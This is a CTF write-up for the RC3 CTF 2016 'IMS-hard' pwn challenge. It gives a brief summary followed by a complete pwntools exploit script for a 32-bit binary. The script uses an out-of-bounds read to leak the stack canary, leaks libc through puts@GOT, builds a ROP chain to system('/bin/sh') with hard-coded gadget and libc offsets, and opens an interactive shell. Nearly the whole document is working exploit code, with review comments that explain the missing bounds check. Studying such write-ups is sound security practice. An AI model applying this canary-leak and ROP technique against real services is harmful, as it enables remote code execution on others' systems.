2016. 11. 25. 00:58
## RC3 CTF_2016(IMS-hard,pwn,400pts)
[Summary]
1. OOB stack read (info-leak) vuln -> canary leak, libc leak
2. NX, Stack Canary Bypass
3. ROP exploit
4. Use libc-database -> libc version check
[Exploit Code]
"""RC3 CTF 2016 - IMS-hard (pwn, 400 pts) solution script, as published in the writeup.

Python 2 script (print statements, xrange, raw_input, str-based pwntools tubes).
It drives the challenge binary's text menu over a pwntools tube `p` and follows
the writeup's summary: an out-of-bounds record read leaks the stack canary, a
second pass leaks a libc address via puts(), and the final pass places a
system("/bin/sh") chain. Every address and offset below is specific to the
challenge binary and the libc build the author resolved with libc-database;
none of them are derived at runtime.

Defender's reading: NX and the stack canary are only bypassed because the
record index passed to "view" is not bounds-checked (per the summary); with
that check in place the canary/libc leak, and therefore the chain, would not
be available.
"""
from pwn import *
import base64  # NOTE(review): imported but never used in this script

# 32-bit Linux target; p32()/u32() below pack/unpack 4-byte little-endian words.
context(arch = 'i386',os='linux')

# Hard-coded run mode: True = spawn the local binary, False = the (retired) CTF service.
local=True

if local:
    p = process("./IMS-hard")
    # NOTE(review): x86_64 libc path while the target is i386, and `libc` is never
    # referenced again - the libc offsets are hard-coded further down instead.
    libc = ELF("/lib/x86_64-linux-gnu/libc-2.19.so")
else:
    p = remote("ims.ctf.rc3.club",8888)

binary = ELF("./IMS-hard")  # NOTE(review): also unused; addresses below are literals

# Blocks until Enter is pressed - presumably a pause to attach a debugger to the child.
raw_input()

def send_add(id_param, code_param):
    """Menu option 1: add a record with ID `id_param` and code `code_param`.

    Both arguments are strings and are sent verbatim followed by a newline; the
    caller is responsible for formatting numbers (str(...)) and packed words
    (p32(...)) beforehand.
    """
    p.recvuntil('Choose: '); p.send('1\n')
    p.recvuntil('ID: '); p.send(id_param + '\n')
    p.recvuntil('code: '); p.send(code_param + '\n')

def send_delete(id_param):
    """Menu option 2: delete the record whose ID is `id_param` (string, sent verbatim)."""
    p.recvuntil('Choose: '); p.send('2\n')
    p.recvuntil('delete: '); p.send(id_param + '\n')

def view_record(index):
    """Menu option 3: view record `index` and return the leaked value as a string.

    The response line is sliced from offset 12 up to the first ',' - the exact
    shape of the line is not visible here; the caller treats the slice as a
    decimal integer (int(...)). Indices past the stored records are what the
    writeup's summary calls the OOB stack read.
    """
    p.recvuntil('Choose: '); p.send('3\n')
    p.recvuntil('view: '); p.send(index + '\n')
    stack_leak = p.recvline()
    stack_leak = stack_leak[12:stack_leak.find(',')]
    #print '[*] wjdebug : ' + hex((int(stack_leak) & 0xffffffff))
    #print '[*] wjdebug : ' + hex(stack_leak)
    return stack_leak

# Fill five records (IDs 0..4, presumably) so that index 5 reads past them.
# 1094795585 == 0x41414141 ('AAAA'), i.e. filler.
for i in xrange(0,5):
    send_add('1094795585','BBBBCCCC')

############################ info leak ################################
# Binary-specific addresses (no PIE assumed: fixed 0x0804xxxx text/GOT).
popret_gadget = 0x08048a7c
libc_start_main_got = 0x08049fec   # NOTE(review): unused
printf_got = 0x08049fc4            # only referenced from the commented-out line below
puts_plt = 0x08048560
puts_got = 0x08049fdc
fwrite_got = 0x08049fd8            # only referenced from the commented-out block below
# libc offsets for the specific libc build identified via libc-database (see ref at end).
puts_offset = 0x657e0
oneshot_gadget_offset = 0x4025b    # computed and printed below, but not used in the chain
system_offset = 0x40310
binsh_offset = 0x16084c
start_addr = 0x8048a7e             # _start: re-enters the program after the leak

print '[INFO LEAK VULN]'
### info 1 ###
# Out-of-bounds read of record 5 returns the stack canary; mask to 32 bits.
canary_leak = view_record('5')
canary_addr = hex(int(canary_leak) & 0xffffffff)
print '[*] stack_canary : ' + canary_addr
print '[*] stack_canary(dec) : ' + str(int(canary_addr,16))
#########################################################################

# Records 5..8 lay out the leak chain (record IDs/codes apparently end up on the
# stack in order - the binary itself is not visible here):
#   canary | filler | puts@plt ; pop;ret ; puts@got | _start
send_add(str(int(canary_addr,16)),'BBBBCCCC') # canary control
send_add('1094795585','BBBBCCCC') # garbage ('AAAABBBBCCCC')
send_add(str(puts_got),p32(puts_plt) + p32(popret_gadget)) # puts_plt + popret + puts_got
#send_add(str(printf_got),p32(puts_plt) + p32(popret_gadget)) # puts_plt + popret + printf_got
send_add('1094795585',p32(start_addr) + 'CCCC') # _start addr

# Option 4 presumably triggers the return into the chain above; puts() then
# prints the GOT entry, from which the libc base is derived.
p.recvuntil('Choose: '); p.send('4\n')
puts_addr = u32(p.recv(4))
libc_base_addr = puts_addr - puts_offset
oneshot_gadget_addr = libc_base_addr + oneshot_gadget_offset
system_addr = libc_base_addr + system_offset
binsh_addr = libc_base_addr + binsh_offset
print '[*] puts_addr : ' + hex(puts_addr)
print '[*] libc_base_addr : ' + hex(libc_base_addr)
print '[*] oneshot_gadget_addr : ' + hex(oneshot_gadget_addr)
print '[*] system_addr : ' + hex(system_addr)
print '[*] binsh_addr : ' + hex(binsh_addr)

# After re-entry via _start, clear the nine records added so far (5 filler + 4 chain).
for i in xrange(0,9):
    send_delete('0')

# Rebuild the same layout with the now-known libc addresses:
#   canary | filler | system ; filler ; "/bin/sh"
for i in xrange(0,5):
    send_add('1094795585','BBBBCCCC')

send_add(str(int(canary_addr,16)),'BBBBCCCC')
send_add('1094795585','BBBBCCCC')
send_add(str(int(binsh_addr)),p32(system_addr) + 'CCCC')

p.recvuntil('Choose: '); p.send('4\n')

######################### libc version check #############################
# Earlier variant kept by the author: dump several GOT entries and look them up
# in libc-database to identify the remote libc build.
#got_leak = p.recv(1024)
#puts_got = u32(got_leak[0:4]);
#puts_got_addr = hex(int(puts_got) & 0xffffffff)
#printf_got = u32(got_leak[5:9]);
#fwrite_got_addr = hex(int(fwrite_got) & 0xffffffff)
#print '[*] puts_got : ' + hex(puts_got)
#print '[*] printf_got : ' + hex(printf_got)
##########################################################################

# Hand the tube over to the user.
p.interactive()

# ref) https://github.com/niklasb/libc-database
# dynELF study (https://gist.github.com/Inndy/a2c630a6e70d892758908915914cebfc)